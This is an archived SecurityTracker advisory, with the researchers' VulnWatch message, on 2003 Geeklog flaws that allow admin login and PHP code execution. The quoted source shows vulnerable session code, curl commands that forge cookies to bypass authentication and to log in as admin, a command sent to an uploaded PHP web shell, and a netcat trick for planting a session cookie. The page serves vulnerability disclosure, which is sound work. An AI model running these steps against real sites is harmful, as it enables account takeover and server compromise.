Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
|
|
|
|
|
|
|
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
|
|
|
|
Become a Partner and License Our Database or Notification Service
|
|
|
|
|
|
|
|
|
|
|
|
|
|
Geeklog Authentication Flaws Let Remote Users Gain 'Admin' Status and Execute Arbitrary PHP Code on the System
|
|
SecurityTracker Alert ID: 1006879
|
|
CVE Reference: GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: May 29 2003
|
Impact: Execution of arbitrary code via network, User access via network
|
Fix Available: Yes
Vendor Confirmed: Yes
|
Advisory: SCAN Associates
|
Version(s): 1.3.7sr1 and prior versions
|
Description: Several vulnerabilities were reported in the Geeklog weblog. A remote user can gain administrator status on the application and can also execute arbitrary PHP code on the target server.
SCAN Associates reported that a remote user can gain access to the system as a regular user or as an administrative user.
It is
reported that a remote user can specify a non-existent session ID to bypass an authentication check in the 'lib-sessions.php' script
and cause the specified session ID to be entered into the state table.
A demonstration exploit command is provided [using the
'curl' tool]:
curl -b geeklog=9999 http://blablaba/users.php
It is also reported that a remote user can supply a floating
point number as the value for the userid variable to login under any user identity, including an administrator.
A demonstration
exploit command is provided:
curl -b geeklog=2.1 -D header.txt http://blablaba/users.php
According to the report, the 'header.txt'
contains valid session information for the admin user.
It is also reported that a remote user [presumably with privileges to
upload images] can upload a valid image file with an arbitrary file extension. A remote user can include PHP code within the image
and upload the file with a file extension associated with PHP and then later call the image file to execute the supplied PHP code
with the privileges of the web server.
A demonstration exploit method is described in the Source Message.
|
Impact: A remote user can gain access to Geeklog acting as any user, including an administrative user.
A remote user with privileges to upload image files can execute arbitrary PHP code on the system with the privileges of the web server.
|
Solution: The vendor has released a fixed version (1.3.7.sr2), available at:
http://www.geeklog.net/filemgmt/singlefile.php?lid=157
An upgrade archive (patch) is also available:
http://www.geeklog.net/filemgmt/singlefile.php?lid=158
|
Vendor URL: www.geeklog.net/article.php?story=20030526093915939 (Links to External Site)
|
Cause: Authentication error, Input validation error
|
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
|
Reported By: pokleyzz <pokleyzz@scan-associates.net>
|
Message History:
None.
|
Source Message Contents
|
Date: Thu, 29 May 2003 13:02:55 +0800
From: pokleyzz <pokleyzz@scan-associates.net>
Subject: [VulnWatch] Geeklog 1.3.7sr1 and below multiple vulnerabilities.
|
--------------030101000501010009080303
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Products: Geeklog 1.3.7sr1 and below (http://www.geeklog.net)
Date: 29 May 2003
Author: pokleyzz <pokleyzz_at_scan-associates.net>
Contributors: sk_at_scan-associates.net
shaharil_at_scan-associates.net
munir_at_scan-associates.net
URL: http://www.scan-associates.net
Summary: Geeklog 1.3.7sr1 and below multiple vulnerabilities.
Description
===========
Geeklog is a 'blog', otherwise known as a Weblog. It allows you to create your
own virtual community area, complete with user administration, story posting,
messaging, comments, polls, calendar, weblinks, and more! It can run on many
different operating systems, and uses PHP4 and MySQL.
Details
=======
i) SQL Integer manipulation in authentication script.
from lib-sessions.php line 128 ------------------------------------------------
if (isset($HTTP_COOKIE_VARS[$_CONF['cookie_name']])) {
// Session cookie doesn't exist but a perminant cookie does.
// Start a new session cookie;
if ($_SESS_VERBOSE) {
COM_errorLog('perm cookie found from lib-common.php',1);
}
$userid = $HTTP_COOKIE_VARS[$_CONF['cookie_name']];
$cookie_password = $HTTP_COOKIE_VARS[$_CONF['cookie_password']];
//echo $userid;
$userpass = DB_getItem($_TABLES['users'],'passwd',"uid = $userid");
if ($cookie_password <> $userpass) {
// User could have modified UID in cookie, don't do shit
} else {
if ($userid) {
$user_logged_in = 1;
//echo $userid;
// Create new session and write cookie
$sessid = SESS_newSession($userid, $REMOTE_ADDR, $_CONF['session_cookie_timeout'],
$_CONF['cookie_ip']);
SESS_setSessionCookie($sessid, $_CONF['session_cookie_timeout'], $_CONF['cookie_se
ssion'], $_CONF['cookie_path'],
$_CONF['cookiedomain'], $_CONF['cookiesecure']);
$userdata = SESS_getUserDataFromId($userid);
$_USER = $userdata;
}
}
}
------------------------------------------------------------------------
In this case :
DB_getItem($_TABLES['users'],'passwd',"uid = $userid"); will execute
"SELECT passwd from $_TABLES['users'] where uid=$userid"
When we supply non-existance user we can by pass the ($cookie_password <> $userpass)
cause $userpass and $cookie_password will be null.
example:
curl -b geeklog=9999 http://blablaba/users.php
SESS_newSession($userid, $REMOTE_ADDR, $_CONF['session_cookie_timeout'], $_CONF['cookie_ip']);
will execute SQL query
"INSERT INTO {$_TABLES['sessions']} (sess_id, md5_sess_id, uid, start_time, remote_ip) VALUES ($
sessid, '$md5_sessid', 9999, $currtime,
'$remote_ip')"
valid session for user 9999 which is not exist will insert to database;
Integer manipulation to get admin access
----------------------------------------
By supplying floating point number as userid, user can easily login as any geeklog
user. This is because userid is integer value in database and floating point number
always give null value for $userpass (non-existance user) . 2.1 will insert as 2 in
column with integer data type.
proof of concept:
curl -b geeklog=2.1 -D header.txt http://blablaba/users.php
header.txt will contain valid session for admin.
ii) Upload image with any extension.
There is lack in error checking for upload image scripts where user can upload valid
with any extention ( users and stories module). User supplied extension will be used
for images extension. By embed php code in image user can execute any command as apache
user on remote server.
proof of concept:
i) Upload attached file to server using "Internet Explorer". "Internet Explorer"
will use file header to generate mime-type for uploaded file.
ii) curl -d 'cmd=ps -ef' http://blablabla/images/XXXXX-X.php
Vendor Response
===============
Vendor has been contacted on 19/05/2003 and fix version is available
http://www.geeklog.net
Tips
====
Simple way to trick mozilla to store session from any site.
i) Edit header.txt.
----------------header.txt -------------------------
HTTP/1.1 200 OK
Date: Sat, 17 May 2003 16:15:23 GMT
Server: Apache
Set-Cookie: gl_session=1828197392; path=/
Set-Cookie: LastVisit=1053188123; expires=Sun, 16-May-2004 16:15:23 GMT;
path=/
Set-Cookie: LastVisitTemp=deleted; expires=Fri, 17-May-2002 16:15:22
GMT; path=/; domain=http://blablabla/
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1
10
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
----------------header.txt --------------------------
ii) Using netcat netcat
# nc -l -p 9090 < header.txt
iii) Set your mozilla http proxy server to 127.0.0.1:9090
iii) Browse to http://blablaba.com/
iv) Unset proxy and browse to http://blablabla.com
--------------030101000501010009080303--
|
|
Go to the Top of This SecurityTracker Archive Page
|
